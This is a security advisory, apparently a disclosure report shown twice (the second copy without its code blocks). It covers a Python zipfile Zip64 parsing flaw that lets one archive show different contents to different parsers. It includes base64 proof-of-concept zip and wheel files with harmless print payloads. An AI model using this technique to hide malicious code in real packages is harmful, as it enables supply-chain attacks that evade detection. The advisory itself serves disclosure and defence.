Summary
It is possible to craft a zip file that, when parsed by Python's zipfile implementation, returns contents that are different from other common zip implementations. This is achieved because Python ignores the offset in the Zip64 locator record. Instead Python's implementation expects to see the Zip64 end-of-central-directory record immediately prior to the Zip64 locator record, and ignores the offset entirely. This means two Zip64 end-of-central-directory records can be present. One that is pointed to by the offset in the Zip64 locator record, and the other that sits prior to the Zip64 locator record.
In order for this to be exploitable, user interaction is required. An attack using this technique would require different zip parsing implementations to be used at different times during the handling of the zip file. For example, Python Wheel files and "uv".
Severity
Moderate - This vulnerability can be leveraged to hide malicious content that evades detection.
Proof of Concept
Single File Zip
The following base64 encoded string is a specially crafted zip file that serves as a simple proof-of-concept.
$ echo "UEsDBBQAAAAAAAAAIQBLlVV3CwAAAAsAAAALAAAAYm9yaW5nX2ZpbGVub3QgcHl0aG9uClBLAQIUAxQAAAAAAAAAIQBLlVV3CwAAAAsAAAALAAAAAAAAAAAAAAC0AQAAAABib3JpbmdfZmlsZVBLBgYsAAAAAAAAAC0ALQAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAA5AAAAAAAAADQAAAAAAAAAUEsDBBQAAAAAAAAAIQBh7IWUCgAAAAoAAAAHAAAAcHlfZmlsZWlzIHB5dGhvbgpQSwECFAMUAAAAAAAAACEAYeyFlAoAAAAKAAAABwAAAAAAAAAAAAAAtAGlAAAAcHlfZmlsZVBLBgYsAAAAAAAAAC0ALQAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAA1AAAAAAAAANQAAAAAAAAAUEsGBwAAAABtAAAAAAAAAAEAAABQSwUGAAAAAAEAAQA5AAAANAAAAAAA" | base64 -d > poc.zip
When unzipped in Python a file called py_file with the contents "is python" will be returned.
When unzipped with other zip implementations, a file called boring_file with the contents "not python" will be returned.
Extracting with Python:
$ mkdir ~/py && cd ~/py
$ python3 -c "import zipfile; zipfile.ZipFile('../poc.zip').extractall()"
$ ls
py_file
$ cat py_file
is python
Extracting with unzip (InfoZip):
$ mkdir ~/unzip && cd ~/unzip
$ unzip ../poc.zip
Archive: ../poc.zip
extracting: boring_file
$ cat boring_file
not python
Implementations that output boring_file include:
- Go
- java.util.zip (seek and streaming)
- InfoZip (unzip)
- MiniZip (zlib)
- PHP
- zip + async_zip Rust crates (seek and streaming)
- Yauzl (npm)
- net.lingala.zip4j (Maven)
- libarchive (bsdunzip)
Wheel
The following base64 encoded string is a specially crafted wheel file, that further demonstrates the flaw and a potential attack scenario.
$ echo "UEsDBBQAAAAAAAAAIQAi5N7ufAAAAHwAAAAlAAAAY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9NRVRBREFUQU1ldGFkYXRhLVZlcnNpb246IDIuNApOYW1lOiBjYndoZWVsemlwNjQKVmVyc2lvbjogMC4wLjEKU3VtbWFyeTogTW9yZSBteXN0ZXJpZXMKQXV0aG9yLWVtYWlsOiBDYWxlYiA8Y2FsZWJicm93bkBnb29nbGUuY29tPgpQSwMEFAAAAAAAAAAhAN1AXn1kAAAAZAAAACIAAABjYndoZWVsemlwNjQtMC4wLjEuZGlzdC1pbmZvL1dIRUVMV2hlZWwtVmVyc2lvbjogMS4wCkdlbmVyYXRvcjogZmxpdCAzLjEyLjAKUm9vdC1Jcy1QdXJlbGliOiB0cnVlClRhZzogcHkyLW5vbmUtYW55ClRhZzogcHkzLW5vbmUtYW55ClBLAwQUAAAAAAAAACEAXL6g5HABAABwAQAAIwAAAGNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vUkVDT1JEY2J3aGVlbHppcDY0L19faW5pdF9fLnB5LHNoYTI1Nj01NTU0ZWNiZTNmOTYyMjk4Mzc3NDE1NzdhZTJkMmYyODVmMTUwOTYxOThmYWViZGFhYTFmNDVmMTlkMzQ5YjQwLDIxCmNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vV0hFRUwsc2hhMjU2PTBmMmI3YTQ4MTdkYTZhYzU4NDk1NGFkNDQ2NDkyNzU0NTAxOTBjNzQ5M2MzMTgzNzNkYTRmMzZiYjQ1MjZlNDYsMTAwCmNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vTUVUQURBVEEsc2hhMjU2PTkwNDc2ZGUxNDFiYzc4NzA0YjQzY2I4NjBhNDIzYTFmYTA0ZmU1NTc1ODQ3MjZhNzUxMWQyYTk0MTkyYzlmOTMsMTI0CmNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vUkVDT1JELCwwMDAzNjhQSwMEFAAAAAAAAAAhAAnQ9UkVAAAAFQAAABgAAABjYndoZWVsemlwNjQvX19pbml0X18ucHlwcmludCgibWFnaWMiKQojINaEk5lQSwECFAMUAAAAAAAAACEAIuTe7nwAAAB8AAAAJQAAAAAAAAAAAAAAtAEAAAAAY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9NRVRBREFUQVBLAQIUAxQAAAAAAAAAIQDdQF59ZAAAAGQAAAAiAAAAAAAAAAAAAAC0Ab8AAABjYndoZWVsemlwNjQtMC4wLjEuZGlzdC1pbmZvL1dIRUVMUEsBAhQDFAAAAAAAAAAhAFy+oORwAQAAcAEAACMAAAAAAAAAAAAAALQBYwEAAGNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vUkVDT1JEUEsBAhQDFAAAAAAAAAAhAAnQ9UkVAAAAFQAAABgAAAAAAAAAAAAAALQBFAMAAGNid2hlZWx6aXA2NC9fX2luaXRfXy5weVBLBgaaAwAAAAAAAC0ALQAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAA6AQAAAAAAAF8DAAAAAAAAUEsDBBQAAAAAAAAAIQBcvqDkcAEAAHABAAAjAAAAY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9SRUNPUkRjYndoZWVsemlwNjQvX19pbml0X18ucHksc2hhMjU2PTAxZjBhMDZjOTUxNTMyNGMxYzcwYmQ0YjQ3Yjg1NWRkNWRmMzg4ZTBlNmU4OWNlZDg4OGY2ODFmNGU3NTY3ZWYsMjEKY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9XSEVFTCxzaGEyNTY9MGYyYjdhNDgxN2RhNmFjNTg0OTU0YWQ0NDY0OTI3NTQ1MDE5MGM3NDkzYzMxODM3M2RhNGYzNmJiNDUyNmU0NiwxMDAKY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9NRVRBREFUQSxzaGEyNTY9OTA0NzZkZTE0MWJjNzg3MDRiNDNjYjg2MGE0MjNhMWZhMDRmZTU1NzU4NDcyNmE3NTExZDJhOTQxOTJjOWY5MywxMjQKY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9SRUNPUkQsLDAwaRpgClBLAwQUAAAAAAAAACEACdD1SRUAAAAVAAAAGAAAAGNid2hlZWx6aXA2NC9fX2luaXRfXy5weXByaW50KCJtb3JlIG1hZ2ljISIpClBLAQIUAxQAAAAAAAAAIQAi5N7ufAAAAHwAAAAlAAAAAAAAAAAAAAC0AQAAAABjYndoZWVsemlwNjQtMC4wLjEuZGlzdC1pbmZvL01FVEFEQVRBUEsBAhQDFAAAAAAAAAAhAN1AXn1kAAAAZAAAACIAAAAAAAAAAAAAALQBvwAAAGNid2hlZWx6aXA2NC0wLjAuMS5kaXN0LWluZm8vV0hFRUxQSwECFAMUAAAAAAAAACEAXL6g5HABAABwAQAAIwAAAAAAAAAAAAAAtAHRBAAAY2J3aGVlbHppcDY0LTAuMC4xLmRpc3QtaW5mby9SRUNPUkRQSwECFAMUAAAAAAAAACEACdD1SRUAAAAVAAAAGAAAAAAAAAAAAAAAtAGCBgAAY2J3aGVlbHppcDY0L19faW5pdF9fLnB5UEsGBiwAAAAAAAAALQAtAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAADoBAAAAAAAAzQYAAAAAAABQSwYHAAAAAJkEAAAAAAAAAQAAAFBLBQYAAAAABAAEADoBAABfAwAAAAA=" | base64 -d > cbwheelzip64-0.0.1-py2.py3-none-any.whl
Installing with uv:
$ mkdir uv && cd uv
$ uv venv env
$ . env/bin/activate
$ uv pip install ../cbwheelzip64-0.0.1-py2.py3-none-any.whl
Using Python 3.12.3 environment at: env
Resolved 1 package in 3ms
Installed 1 package in 1ms
+ cbwheelzip64==0.0.1 (from file:///home/calebbrown/cbwheelzip64-0.0.1-py2.py3-none-any.whl)
$ python3 -c 'import cbwheelzip64'
magic
installing with pip:
$ mkdir py && cd py
$ python3 -m venv env
$ . env/bin/activate
$ pip install ../cbwheelzip64-0.0.1-py2.py3-none-any.whl
Processing /home/calebbrown/cbwheelzip64-0.0.1-py2.py3-none-any.whl
Installing collected packages: cbwheelzip64
Successfully installed cbwheelzip64-0.0.1
$ python3 -c 'import cbwheelzip64'
more magic!
Further Analysis
# cpython/Lib/zipfile/__init__.py @ 6bf1c0ab3497b1b193812654bcdfd0c11b4192d8
# Simplified implementation, removing conditions and error handling.
def _EndRecData64(fpin, offset, endrec):
fpin.seek(offset - sizeEndCentDir64Locator, 2)
data = fpin.read(sizeEndCentDir64Locator)
sig, diskno, reloff, disks = struct.unpack(structEndArchive64Locator, data)
# Assume no 'zip64 extensible data'
fpin.seek(offset - sizeEndCentDir64Locator - sizeEndCentDir64, 2)
data = fpin.read(sizeEndCentDir64)
# ...
The above code snippet is the current logic used to read the zip64 end-of-central-directory record.
sizeEndCentDir64Locator and sizeEndCentDir64 are both constants derived from the struct.calcsize on import.
When reading the zip64 end-of-central-directory the zip64 locator record (reloff) is ignored entirely, and instead the offset is calculated from the record size constants.
The comment "Assume no 'zip64 extensible data'" seems to suggest this "fixed offset" behaviour is intentional, as reading the "zip64 extensible data" field would require treating the zip64 end-of-central-directory record as having a variable size.
However by making this assumption, Python's zip implementation now differs from the majority of other implementations, which do use the offset from the zip64 locator record.
Finally, the assumption of no extensible data is not validated. reloff is not checked to ensure that it corresponds to the position of the zip64 end-of-central-directory record that is actually read. This means that reloff can point to a separate zip64 end-of-central-directory record that returns different content to the one read by Python.
Timeline
Date reported: 07/28/2025
Date fixed:
Date disclosed: 10/27/2026
Summary
It is possible to craft a zip file that, when parsed by Python's zipfile implementation, returns contents that are different from other common zip implementations. This is achieved because Python ignores the offset in the Zip64 locator record. Instead Python's implementation expects to see the Zip64 end-of-central-directory record immediately prior to the Zip64 locator record, and ignores the offset entirely. This means two Zip64 end-of-central-directory records can be present. One that is pointed to by the offset in the Zip64 locator record, and the other that sits prior to the Zip64 locator record.
In order for this to be exploitable, user interaction is required. An attack using this technique would require different zip parsing implementations to be used at different times during the handling of the zip file. For example, Python Wheel files and "uv".
Severity
Moderate - This vulnerability can be leveraged to hide malicious content that evades detection.
Proof of Concept
Single File Zip
The following base64 encoded string is a specially crafted zip file that serves as a simple proof-of-concept.
When unzipped in Python a file called py_file with the contents "is python" will be returned.
When unzipped with other zip implementations, a file called boring_file with the contents "not python" will be returned.
Extracting with Python:
Extracting with unzip (InfoZip):
Implementations that output boring_file include:
Wheel
The following base64 encoded string is a specially crafted wheel file, that further demonstrates the flaw and a potential attack scenario.
Installing with uv:
installing with pip:
Further Analysis
The above code snippet is the current logic used to read the zip64 end-of-central-directory record.
sizeEndCentDir64LocatorandsizeEndCentDir64are both constants derived from thestruct.calcsizeon import.When reading the zip64 end-of-central-directory the zip64 locator record (
reloff) is ignored entirely, and instead the offset is calculated from the record size constants.The comment "Assume no 'zip64 extensible data'" seems to suggest this "fixed offset" behaviour is intentional, as reading the "zip64 extensible data" field would require treating the zip64 end-of-central-directory record as having a variable size.
However by making this assumption, Python's zip implementation now differs from the majority of other implementations, which do use the offset from the zip64 locator record.
Finally, the assumption of no extensible data is not validated.
reloffis not checked to ensure that it corresponds to the position of the zip64 end-of-central-directory record that is actually read. This means thatreloffcan point to a separate zip64 end-of-central-directory record that returns different content to the one read by Python.Timeline
Date reported: 07/28/2025
Date fixed:
Date disclosed: 10/27/2026